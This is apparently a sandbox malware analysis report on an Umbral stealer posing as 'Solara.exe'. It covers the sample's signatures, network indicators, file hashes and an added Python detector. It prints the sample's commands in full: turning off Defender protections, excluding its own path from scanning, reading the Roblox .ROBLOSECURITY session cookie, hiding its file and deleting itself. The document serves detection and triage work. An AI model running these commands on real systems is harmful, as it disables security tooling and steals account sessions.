Malware Analysis Report

2024-10-10 09:56

Sample ID: 240709-mmmgla1gre
Target:    Solara.exe
SHA256:    7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
Tags:      umbral, execution, spyware, stealer
Score:     10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467

Threat Level: Known bad

The file Solara.exe was found to be: Known bad.

Malicious Activity Summary

umbral execution spyware stealer

Umbral

Detect Umbral payload

Umbral family

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-09 10:35

Signatures

Detect Umbral payload
    (no description, indicator, process or target recorded)

Umbral family
    umbral

Unsigned PE
    (no description, indicator, process or target recorded)

Analysis: behavioral1

Detonation Overview

Submitted:        2024-07-09 10:35
Reported:         2024-07-09 11:05
Platform:         win11-20240704-en
Max time kernel:  1460s
Max time network: 1488s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara.exe"

Signatures

Detect Umbral payload
    (no description, indicator, process or target recorded)

Umbral
    stealer umbral

Command and Scripting Interpreter: PowerShell
    execution
    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    (no description, indicator or target recorded)

Drops file in Drivers directory
    Description: File opened for modification
    Indicator:   C:\Windows\System32\drivers\etc\hosts
    Process:     C:\Users\Admin\AppData\Local\Temp\Solara.exe
    The signature name comes from the drivers\ path; what the sample actually opened for writing is the hosts file, so name resolution on an affected host should be checked as part of triage, not just the drivers directory.

Reads user/profile data of web browsers
    spyware stealer

Legitimate hosting services abused for malware hosting/C2
    Indicator: discord.com (two hits; no description, process or target recorded)

Looks up external IP address via web service
    Indicator: ip-api.com

Detects videocard installed
    Process: C:\Windows\System32\Wbem\wmic.exe

Runs ping.exe
    Process: C:\Windows\system32\PING.EXE

Suspicious use of AdjustPrivilegeToken

Indicator and Target were N/A for every row; the rows are grouped by process, with the number of times each token was enabled in parentheses.

C:\Users\Admin\AppData\Local\Temp\Solara.exe
    SeDebugPrivilege (1)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    SeDebugPrivilege (4)

C:\Windows\System32\Wbem\wmic.exe (three batches of the same set; the third batch omits the four numeric tokens)
    SeIncreaseQuotaPrivilege (3), SeSecurityPrivilege (3), SeTakeOwnershipPrivilege (3),
    SeLoadDriverPrivilege (3), SeSystemProfilePrivilege (3), SeSystemtimePrivilege (3),
    SeProfSingleProcessPrivilege (3), SeIncBasePriorityPrivilege (3), SeCreatePagefilePrivilege (3),
    SeBackupPrivilege (3), SeRestorePrivilege (3), SeShutdownPrivilege (3), SeDebugPrivilege (3),
    SeSystemEnvironmentPrivilege (3), SeRemoteShutdownPrivilege (3), SeUndockPrivilege (3),
    SeManageVolumePrivilege (3)
    Token 33 (2), Token 34 (2), Token 35 (2), Token 36 (2)
    (the sandbox printed these four as raw privilege LUIDs; Windows defines them as SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege)

wmic.exe enabling every privilege present in its token is normal for that tool and looks the same on a clean host. The rows worth attention are SeDebugPrivilege being enabled by Solara.exe itself and by the PowerShell children it spawned.

Suspicious use of WriteProcessMemory

Each event was recorded twice; Indicator was N/A for every row.

PID 4036 (C:\Users\Admin\AppData\Local\Temp\Solara.exe) wrote to memory of:
    4868  C:\Windows\System32\Wbem\wmic.exe
    2916  C:\Windows\SYSTEM32\attrib.exe
    4644  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    4288  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3496  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1828  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1964  C:\Windows\System32\Wbem\wmic.exe
    1508  C:\Windows\System32\Wbem\wmic.exe
    3688  C:\Windows\System32\Wbem\wmic.exe
    4692  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3360  C:\Windows\System32\Wbem\wmic.exe
    4824  C:\Windows\SYSTEM32\cmd.exe

PID 4824 (C:\Windows\SYSTEM32\cmd.exe) wrote to memory of:
    2520  C:\Windows\system32\PING.EXE

Every target is a child that the writing process itself launched, in the same order as the process list below. These writes are therefore consistent with ordinary process creation (the parent populating the new process before it starts running) rather than code injection; injection into an unrelated process would show a target the writer did not spawn.

Views/modifies file attributes

evasion
    Process: C:\Windows\SYSTEM32\attrib.exe
    (no description, indicator or target recorded)

Processes

C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    The sample itself (PID 4036 in the memory-write table above). Every process below except PING.EXE is its direct child, listed in launch order.

C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    Host fingerprinting: SMBIOS system UUID.

C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    Sets the hidden and system attributes on its own executable so a default Explorer or dir view does not show it.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
    Adds its own path to the Microsoft Defender exclusion list.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    Attempts to turn off Defender real-time monitoring, IOAV (download) scanning, script scanning, the intrusion prevention system and controlled folder access, set network protection to audit-only, and disable MAPS cloud reporting and sample submission; the second Set-MpPreference repeats the last setting with its numeric value (2 = NeverSend). Two caveats for anyone assessing impact: the cmdlets need an elevated session, and with Tamper Protection enabled the real-time and cloud-protection changes are rejected; and the && chain operator is not a valid statement separator in Windows PowerShell 5.1, which is the engine at this path, so the whole line fails to parse on that engine. Confirm the actual Defender state on an affected host with Get-MpPreference rather than assuming these settings took effect.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    Reads the .ROBLOSECURITY session cookie that Roblox Studio stores in the current user's registry; this value is sufficient to take over the account without the password.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    The same lookup aimed at the machine hive. "HKLN:" is the sample's own typo for HKLM:; PowerShell has no drive by that name, so this command errors out. Reproduced as run, not corrected.

C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    Fingerprinting: OS edition.

C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    Fingerprinting: installed RAM.

C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    Fingerprinting: SMBIOS UUID, queried a second time.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    Fingerprinting: CPU identifier string from the registry.

C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    Fingerprinting: GPU name (the "Detects videocard installed" signature).

C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Solara.exe" && pause
    Self-removal: ping localhost serves as a short delay so the parent can exit, then del with the /F and /A switches (needed because the file now carries the hidden attribute set by attrib) removes the executable.

C:\Windows\system32\PING.EXE
    ping localhost
    Child of cmd.exe, not of Solara.exe.
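As an added example, not part of the sandbox report or of the Umbral sample, the following Python detector takes process-creation records shaped like the chain above and flags the tactics it shows: Defender tamper via Set-MpPreference, a Defender exclusion pointing at a user-writable path, attrib +h +s applied to the parent's own binary, the ping-then-del self-removal, the .ROBLOSECURITY registry read, and a burst of wmic fingerprinting queries from one parent. The records are constructed from the command lines listed above; child PIDs are taken from the WriteProcessMemory table, while the sample's own parent PID (1000) and the benign control record (PID 5000 under parent 900, excluding a Program Files path) are invented for the example.

```python
"""Flag the Umbral-style process chain from process-creation records.

Added example for this report, not sandbox output. Input fields mirror
Sysmon Event ID 1 (pid, parent pid, image, command line). The records are
constructed from the command lines in the Processes section; child PIDs come
from the WriteProcessMemory table, parent PID 1000 for the sample and the
benign control record (PID 5000, parent 900) are invented."""
import re
from collections import defaultdict

EXE = r"C:\Users\Admin\AppData\Local\Temp\Solara.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"

EVENTS = [  # (pid, ppid, image, command_line)
    (4036, 1000, EXE, f'"{EXE}"'),
    (4868, 4036, WMIC, '"wmic.exe" csproduct get uuid'),
    (2916, 4036, r"C:\Windows\SYSTEM32\attrib.exe", f'"attrib.exe" +h +s "{EXE}"'),
    (4644, 4036, PS, f"\"powershell.exe\" Add-MpPreference -ExclusionPath '{EXE}'"),
    (4288, 4036, PS, '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
                     '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
                     '-DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
                     '-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
                     '-SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2'),
    (3496, 4036, PS, r'"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    (1964, 4036, WMIC, '"wmic.exe" os get Caption'),
    (1508, 4036, WMIC, '"wmic.exe" computersystem get totalphysicalmemory'),
    (3360, 4036, WMIC, '"wmic" path win32_VideoController get name'),
    (4824, 4036, r"C:\Windows\SYSTEM32\cmd.exe", f'"cmd.exe" /c ping localhost && del /F /A h "{EXE}" && pause'),
    # Constructed benign control: an admin excluding a Program Files path under another parent.
    (5000, 900, PS, r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\agent.exe"'),
]

# Paths a standard user can write to; an exclusion there is far more suspicious than Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\", re.I)
# Any Set-MpPreference argument that weakens Defender.
DEFENDER_OFF = re.compile(
    r"-Disable\w+\s+\$true|-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+(?:NeverSend|2)\b"
    r"|-EnableControlledFolderAccess\s+Disabled", re.I)
WMI_FINGERPRINT = re.compile(
    r"csproduct get uuid|os get caption|computersystem get totalphysicalmemory|win32_videocontroller", re.I)
EXCLUSION = re.compile(r"-ExclusionPath\s+['\"]?([^'\"]+)", re.I)


def tags_for(image, cmd, parent_image):
    """Per-event indicators; parent_image lets us recognise actions aimed at the parent's own file."""
    name = image.lower().rsplit("\\", 1)[-1]
    low = cmd.lower()
    self_ref = bool(parent_image) and parent_image.lower() in low
    tags = set()
    if name == "powershell.exe":
        if "set-mppreference" in low and DEFENDER_OFF.search(cmd):
            tags.add("defender_tamper")
        m = EXCLUSION.search(cmd)
        if m and USER_WRITABLE.search(m.group(1)):
            tags.add("defender_exclusion_user_writable")
        if ".roblosecurity" in low:
            tags.add("roblox_cookie_theft")
    elif name == "attrib.exe" and "+h" in low and "+s" in low:
        tags.add("hide_own_binary" if self_ref else "hide_file")
    elif name == "cmd.exe" and re.search(r"\bping\b.*&&\s*del\b", low):
        tags.add("self_delete" if self_ref else "delayed_delete")
    return tags


def analyze(events, min_wmi_queries=3):
    """Group indicators by parent PID and add a tag when one parent runs several wmic fingerprint queries."""
    image_of = {pid: image for pid, _, image, _ in events}
    findings = defaultdict(set)
    wmi_seen = defaultdict(set)
    for pid, ppid, image, cmd in events:
        findings[ppid] |= tags_for(image, cmd, image_of.get(ppid, ""))
        if image.lower().endswith("wmic.exe"):
            m = WMI_FINGERPRINT.search(cmd)
            if m:
                wmi_seen[ppid].add(m.group(0).lower())
    for ppid, queries in wmi_seen.items():
        if len(queries) >= min_wmi_queries:
            findings[ppid].add("wmi_fingerprint_burst")
    return {ppid: tags for ppid, tags in findings.items() if tags}


SEVERE = {"defender_tamper", "self_delete", "hide_own_binary", "roblox_cookie_theft"}


def verdict(tags):
    """'high' when at least two of the severe behaviours co-occur under one parent."""
    if len(tags & SEVERE) >= 2:
        return "high"
    return "medium" if tags else "low"


if __name__ == "__main__":
    image_of = {pid: image for pid, _, image, _ in EVENTS}
    for ppid, tags in analyze(EVENTS).items():
        print(f"{image_of.get(ppid, '?')} (PID {ppid}): {verdict(tags)} {sorted(tags)}")
```

Run against the constructed records, only parent 4036 is reported, with a high verdict; the control exclusion under parent 900 produces nothing because its target is not a user-writable path. The correlation on parent PID is what separates this chain from the individual commands, each of which an administrator might legitimately run on its own.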

Network

Country  Destination           Domain                       Proto
US       8.8.8.8:53            gstatic.com                  udp
GB       142.250.200.3:443     gstatic.com                  tcp
US       208.95.112.1:80       ip-api.com                   tcp
US       8.8.8.8:53            3.200.250.142.in-addr.arpa   udp
US       208.95.112.1:80       ip-api.com                   tcp
US       162.159.135.232:443   discord.com                  tcp
US       8.8.8.8:53            26.35.223.20.in-addr.arpa    udp
US       150.171.27.10:443     tse1.mm.bing.net             tcp   (five connections)

The 8.8.8.8:53 rows are DNS lookups, with the Domain column giving the name queried; the in-addr.arpa entries are reverse lookups of 142.250.200.3 and 20.223.35.26. The destinations the signatures above attribute to the sample are ip-api.com over plain HTTP (external IP lookup) and discord.com over TLS (the "legitimate hosting services abused" hit, consistent with webhook-based exfiltration). gstatic.com and tse1.mm.bing.net are typical Windows and browser background traffic in a sandbox and should not be treated as indicators.

Files

The memory/ entries are dumps the sandbox took from PID 4036 (Solara.exe) and PID 4644 (the first powershell.exe). The region 0x00007FF97DDE0000-0x00007FF97E8A2000 appears in both processes at the same address, which points to a shared module image mapped into both rather than code copied from one process into the other. The on-disk files listed here (__PSScriptPolicyTest_*.ps1, CLR_v4.0\UsageLogs\powershell.exe.log and StartupProfileData-NonInteractive) are ordinary artifacts that PowerShell and the .NET runtime write at startup; they are by-products of the PowerShell children, not payloads dropped by the sample, so their hashes are not indicators of this malware.

memory/4036-0-0x00007FF97DDE3000-0x00007FF97DDE5000-memory.dmp

memory/4036-1-0x000001EF42940000-0x000001EF42986000-memory.dmp

memory/4036-2-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-11-0x000001E6532C0000-0x000001E6532E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p30mhrai.ahx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4644-12-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-13-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-14-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-17-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6903d57eed54e89b68ebb957928d1b99
SHA1 fade011fbf2e4bc044d41e380cf70bd6a9f73212
SHA256 36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52
SHA512 c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

memory/4036-31-0x000001EF5D110000-0x000001EF5D186000-memory.dmp

memory/4036-32-0x000001EF5D190000-0x000001EF5D1E0000-memory.dmp

memory/4036-33-0x000001EF5D090000-0x000001EF5D0AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6490e5c0581c173062323b1c20cfd9ff
SHA1 1652893659f99b780fd9733243637eb7795f5212
SHA256 a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79
SHA512 fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

memory/4036-67-0x000001EF5D0D0000-0x000001EF5D0DA000-memory.dmp

memory/4036-68-0x000001EF5D1E0000-0x000001EF5D1F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e4ce193b91cf2884816e810206c68d4
SHA1 b060d309be5e2ebfec4d8a45629fe9c832b025c0
SHA256 287481dc48be90f1a7469ec4bca5f3ee5a323ee5d1c599c1cc4212204b06f909
SHA512 5f11b694ecee875b3758e675200af0d42a32c7bec2a4fcb15d823531c7d680b47cd1711d6eb8e1e3ceb48f569b136286777d4ac59edf99c7c7bf51420e072add

memory/4036-85-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp